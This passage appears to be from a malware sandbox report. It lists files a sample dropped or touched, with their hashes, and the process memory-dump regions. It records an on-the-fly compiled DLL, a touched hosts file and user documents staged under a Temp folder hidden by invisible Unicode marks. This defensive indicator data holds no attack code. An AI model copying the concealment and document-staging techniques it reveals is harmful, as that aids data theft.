e5bfd29f92c28afa79a02dc97a26ed47e4f199b4

SHA256
fac71c7622957fe0773214c7432364d7fc39c5e12250ff9eaaeea4d897564dc7

SHA512
1fb0b8100dffd18c433c4aa97a4f2da76ff6e62e2ef2139edc4f98603ba0bb1c27b310b187b5070cf4e892ffc2d09661a6914defa4509c99b60bcbb50f70f4a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w1vdju5z.gwe.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\f4v4eh1w\f4v4eh1w.dll

Filesize
4KB

MD5
90c9a65c9e7e312467035b4d1f99dc44

SHA1
047f6fc9bc639ab931a19feda94ea51c1d5afa03

SHA256
a0496f38b135eeff234b94fc219e9fcbbfd03f32b675a9e2a63e8ef48d8ee11f

SHA512
58c0db27a0a9c6b093b46b69ba937aa39a252e6dfb28d5fd8df48c47712c429a556675b1327303be15e6b97a6ff8d3740b21aae0c5fe6ff270ac94d68be3e8cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎   ‏ \Common Files\Desktop\ConvertToTest.docx

Filesize
14KB

MD5
ade8eec21928acc528b795a7e1b2bb7c

SHA1
1424f19a14643cbab736fbdbf39bf08b57a72c6e

SHA256
10143f4a3909e34873f47b0187b1e93d9e7be8ec349d1ba5b8f7f3829e313df5

SHA512
f66a4b6fc9e9c13c66b9e5b05c1b7f3c2dd9a09f24de3981b271ea9a5f61a64df7438b3e9d215d578b5d5070d6a836f90d67420193417d2952f45cac5c30c28b

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎   ‏ \Common Files\Desktop\EditUnblock.png

Filesize
576KB

MD5
95ea291247824c7500a895820a4728a5

SHA1
b7425f54cc9e2a3058052eb72d9ba2c571874994

SHA256
c6bc6de977f3ba2817dcd727cdebddd1ca36d381d1083a87c63ff9f7dd9ca843

SHA512
f8d512d69c59b18dadbc583cb8660f36dcd87ad4a4dbe68aab0269fd78c573dd3648c0ffce4d0907b28dde596adefcc8991889d5025912f2096aeafdc604d2d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎   ‏ \Common Files\Desktop\InstallStart.png

Filesize
992KB

MD5
cf180841d6ba6d67effafe2e5e09cf0e

SHA1
5a987f588b6bf93bee32854075ff5118274d8bbd

SHA256
0ec595ab9aa32128faf606a762f863d1be185b96c8f026639dcae07da9cef75b

SHA512
100de086367008411c81ececf4db3e46759b88edaa0522269ac2f99508bd135b56105e4360b80d9b8ddbcd501516f988d206705c6933082bfa939b568ddb831a

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎   ‏ \Common Files\Desktop\NewBackup.htm

Filesize
1.5MB

MD5
ac9a26217f37f1c3e6e8ef703adc8088

SHA1
240815419a40e6ca1b79c84938a849f4e0615738

SHA256
70cb792bc3d9136b329eb108fa2edf38303416ae41cde3cd248939cf2365681e

SHA512
e974adf886cf6b17cf6fab66f58549cd2da329b311feb4318a4cce4b6a443455991c8b22407565659f0b4977e3313f74c07ea3df5dd2cbc08003454ef3f9a3f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎   ‏ \Common Files\Desktop\RestartStop.docx

Filesize
416KB

MD5
ce08ddec6ed3700a9649799dbb37437f

SHA1
b8f4974ea55e774765e7558bc7fe75c39fcb6ced

SHA256
b4edbc255c8d243d0e5187ac26750fe318dfd3c3db84ae781f30301b645e5c43

SHA512
63357eed0637d0b103075b563402c6c60f35701c2f9424f57a8af4129a30bae46988eed31a57790a64eda53ee4e5123c39a842e3beb773ca51cefbe1aad5d4cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎   ‏ \Common Files\Desktop\TraceShow.docx

Filesize
12KB

MD5
ceee365a994393bbd91498fffadc64fc

SHA1
34df542e02cadd095a0e11458681cad1404d170c

SHA256
5ff4ab294e53a0960674d6d49ed359935d60525698b2af3148f1ae1e2219f444

SHA512
8b16fcc2588915944c84305b8f2b20f1ae5002aa9c59e14a3dfc39011f5e8939a0206a4596c297eb2619a6e9023d43ca4baf3e672ae0ad52c6c3aa95a354b237

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎   ‏ \Common Files\Documents\ConvertRedo.doc

Filesize
1.2MB

MD5
abf87cdd8fc018f6709795a69bde024e

SHA1
081add68669bca315122f3e64178b4e9add408f7

SHA256
0eba68a8dcb82cdad2ed150dba0d52e4a330529a0fb76cf4dd33d87605e8bc7c

SHA512
6d206a5c623aa36b8209349bc052c202a47ea86b566cdc83e028ce2dcdee5cd3a8fb481cddaf9557172b5d8df8b8110c941bb4daf86566921d9d0641ab7f112a

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎   ‏ \Common Files\Documents\EditEnable.xlsx

Filesize
10KB

MD5
e807c759f4b6f6e9fd09364f316fedd1

SHA1
ecf36b5a2603d22734bae09cd3e76c3a69f221e7

SHA256
bb8fcfa74fae35f8322765f18fd4769ddddf7bfee55989098c96d6d87fea90a4

SHA512
1dfa7d605d6725dd7d6e9d45b26d2517883bb2b08c063500d7fa3a73b91231fdfec82c9405bf70cda9c2317997e677fb784d982eb7167c5557cfb57fe290895f

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎   ‏ \Common Files\Documents\LimitUpdate.xlsx

Filesize
11KB

MD5
32631769baed99002929159b59033719

SHA1
104a9643ba7266128fe28e9b2b26ea38e6561823

SHA256
042489193c96303f828c23d09097019766a09c345c4097f7f47850d444bdbe0e

SHA512
07bf6580d200cc39c12423b98b03271329c299f7a0c20abc6d8e025ee6f0e56fcdd1f1902006383d49520fbc5c757919a2e5d01974d2a6e4eefef2cc74234711

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎   ‏ \Common Files\Documents\ShowDisable.xls

Filesize
946KB

MD5
1afac22a2d9920cb3099be4a2c8778ce

SHA1
3ced2edbaff29feddd99f12e83d3459919410d4d

SHA256
5b0435cb79467e245de8d2d8d13c91e87714a00543808f99a04d8cd0117ddc1e

SHA512
26379a4afd0f9e31e54abd9706663323da8ec73af6c0d89dca5894d246cb2b9903747babf7f7c9938a21f01740b16d1245a9f3d0ca8aed5339abef768811415a

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎   ‏ \Common Files\Documents\SuspendReceive.docx

Filesize
19KB

MD5
7d998850354d519b720ecdd58a9d443e

SHA1
11f79fbb9b3ff89ecd47e6e1696ebd952644fbb0

SHA256
053cdc75cb4d6bf49a6f90d17ee82b2d4df62c802abbe11d45b400a0b4c21f25

SHA512
b1e33ef3413ace15bd229dd6419777d0948b7711c9df7316cfcbff0d4bcc2a4161ea05c0adb0fb8ecc12ea03ec4763796ba9d27d3a83cc276f20e1c63b0dc517

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎   ‏ \Common Files\Downloads\EnableBackup.mov

Filesize
560KB

MD5
2aa0369f0e3bd0b55cdc2eea073ff0ba

SHA1
167d25763aa873fd2ca14ed3d2baed526e9c40ee

SHA256
09a55db19f5be80ac4f85aadaf6bba1f687a2ffcc5e7e1d1322bff60b3a51897

SHA512
86e473b8fa810e6575c5a197494d29b272f4d051eb84d108f43588543caeab8167fb4821fed04a30008ed1bd37779444d59daa394e6ed7e622e251e8d4e7c867

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\f4v4eh1w\CSC16A312D9FC114FEDADF7C7AB1E6B17C.TMP

Filesize
652B

MD5
2aeeaf6ddaa1985b7d770d9f5f452e37

SHA1
67381387230b69fb7c5448dddf027af389906166

SHA256
be512685aa4d73a02e86dee1e49d82697419ec8821fade246950c380db0b2e6f

SHA512
eaad53ee785a9629270ee46c9cc2eaa70c07970c0ce15e17cc73e8f0cf367f2f759e60f6f8eb579a61e3e99f766899d47d0c8488459d19f97fa8c426b4de8b6f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\f4v4eh1w\f4v4eh1w.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\f4v4eh1w\f4v4eh1w.cmdline

Filesize
607B

MD5
2d60aaf516d14adc110d83f84029b410

SHA1
c32d45aa94b2fa7ebe6d3b819c30e5b69e8b91d1

SHA256
d66cb25aeb9b6ff6a4a466181a0e0acf55f7a2a4669c5a55784068ba81cb1ba1

SHA512
de7cd6f5f62b0d08524e57eea9e79e6ce3dc66e35d0698438cbcc318e5cfb86cdadca787641ebcb7e106b22d9cb7eaec462cd8d8679c3476e4cdb3f4a34e9ea3

Download Submit
memory/1352-110-0x00007FFC71BA0000-0x00007FFC72661000-memory.dmp

Filesize
10.8MB

Download
memory/1352-86-0x000002B97D930000-0x000002B97D952000-memory.dmp

Filesize
136KB

Download
memory/1352-85-0x00007FFC71BA3000-0x00007FFC71BA5000-memory.dmp

Filesize
8KB

Download
memory/1352-107-0x00007FFC71BA0000-0x00007FFC72661000-memory.dmp

Filesize
10.8MB

Download
memory/1352-105-0x00007FFC71BA0000-0x00007FFC72661000-memory.dmp

Filesize
10.8MB

Download
memory/2596-208-0x000001FCF8200000-0x000001FCF8208000-memory.dmp

Filesize
32KB

Download
memory/3364-63-0x00007FFC82DD0000-0x00007FFC82DE9000-memory.dmp

Filesize
100KB

Download
memory/3364-336-0x00007FFC862A0000-0x00007FFC862B4000-memory.dmp

Filesize
80KB

Download
memory/3364-83-0x00007FFC82DF0000-0x00007FFC82E13000-memory.dmp

Filesize
140KB

Download
memory/3364-58-0x00007FFC82DF0000-0x00007FFC82E13000-memory.dmp

Filesize
140KB

Download
memory/3364-79-0x00007FFC83790000-0x00007FFC837BD000-memory.dmp

Filesize
180KB

Download
memory/3364-78-0x00007FFC83470000-0x00007FFC8347D000-memory.dmp

Filesize
52KB

Download
memory/3364-211-0x00007FFC73160000-0x00007FFC7322D000-memory.dmp

Filesize
820KB

Download
memory/3364-84-0x00007FFC73230000-0x00007FFC733A7000-memory.dmp

Filesize
1.5MB

Download
memory/3364-210-0x00007FFC82A90000-0x00007FFC82AC3000-memory.dmp

Filesize
204KB

Download
memory/3364-54-0x00007FFC83790000-0x00007FFC837BD000-memory.dmp

Filesize
180KB

Download
memory/3364-82-0x00007FFC81F80000-0x00007FFC8209C000-memory.dmp

Filesize
1.1MB

Download
memory/3364-68-0x00007FFC733B0000-0x00007FFC73999000-memory.dmp

Filesize
5.9MB

Download
memory/3364-71-0x00007FFC73160000-0x00007FFC7322D000-memory.dmp

Filesize
820KB

Download
memory/3364-271-0x000001D9792B0000-0x000001D9797D2000-memory.dmp

Filesize
5.1MB

Download
memory/3364-272-0x00007FFC72C30000-0x00007FFC73152000-memory.dmp

Filesize
5.1MB

Download
memory/3364-72-0x000001D9792B0000-0x000001D9797D2000-memory.dmp

Filesize
5.1MB

Download
memory/3364-73-0x00007FFC83820000-0x00007FFC83843000-memory.dmp

Filesize
140KB

Download
memory/3364-32-0x00007FFC88590000-0x00007FFC8859F000-memory.dmp

Filesize
60KB

Download
memory/3364-66-0x00007FFC82A90000-0x00007FFC82AC3000-memory.dmp

Filesize
204KB

Download
memory/3364-77-0x00007FFC862A0000-0x00007FFC862B4000-memory.dmp

Filesize
80KB

Download
memory/3364-64-0x00007FFC86180000-0x00007FFC8618D000-memory.dmp

Filesize
52KB

Download
memory/3364-60-0x00007FFC73230000-0x00007FFC733A7000-memory.dmp

Filesize
1.5MB

Download
memory/3364-114-0x00007FFC82DD0000-0x00007FFC82DE9000-memory.dmp

Filesize
100KB

Download
memory/3364-81-0x00007FFC83410000-0x00007FFC83429000-memory.dmp

Filesize
100KB

Download
memory/3364-74-0x00007FFC72C30000-0x00007FFC73152000-memory.dmp

Filesize
5.1MB

Download
memory/3364-30-0x00007FFC83820000-0x00007FFC83843000-memory.dmp

Filesize
140KB

Download
memory/3364-25-0x00007FFC733B0000-0x00007FFC73999000-memory.dmp

Filesize
5.9MB

Download
memory/3364-310-0x00007FFC83820000-0x00007FFC83843000-memory.dmp

Filesize
140KB

Download
memory/3364-315-0x00007FFC73230000-0x00007FFC733A7000-memory.dmp

Filesize
1.5MB

Download
memory/3364-309-0x00007FFC733B0000-0x00007FFC73999000-memory.dmp

Filesize
5.9MB

Download
memory/3364-334-0x00007FFC73160000-0x00007FFC7322D000-memory.dmp

Filesize
820KB

Download
memory/3364-340-0x00007FFC83820000-0x00007FFC83843000-memory.dmp

Filesize
140KB

Download
memory/3364-348-0x00007FFC82A90000-0x00007FFC82AC3000-memory.dmp

Filesize
204KB

Download
memory/3364-347-0x00007FFC73230000-0x00007FFC733A7000-memory.dmp

Filesize
1.5MB

Download
memory/3364-346-0x00007FFC82DD0000-0x00007FFC82DE9000-memory.dmp

Filesize
100KB

Download
memory/3364-345-0x00007FFC86180000-0x00007FFC8618D000-memory.dmp

Filesize
52KB

Download
memory/3364-344-0x00007FFC82DF0000-0x00007FFC82E13000-memory.dmp

Filesize
140KB

Download
memory/3364-343-0x00007FFC83410000-0x00007FFC83429000-memory.dmp

Filesize
100KB

Download
memory/3364-342-0x00007FFC83790000-0x00007FFC837BD000-memory.dmp

Filesize
180KB

Download
memory/3364-341-0x00007FFC88590000-0x00007FFC8859F000-memory.dmp

Filesize
60KB

Download
memory/3364-339-0x00007FFC733B0000-0x00007FFC73999000-memory.dmp

Filesize
5.9MB

Download
memory/3364-338-0x00007FFC81F80000-0x00007FFC8209C000-memory.dmp

Filesize
1.1MB

Download
memory/3364-337-0x00007FFC83470000-0x00007FFC8347D000-memory.dmp

Filesize
52KB

Download
memory/3364-56-0x00007FFC83410000-0x00007FFC83429000-memory.dmp

Filesize
100KB

Download
memory/3364-335-0x00007FFC72C30000-0x00007FFC73152000-memory.dmp

Filesize
5.1MB

Download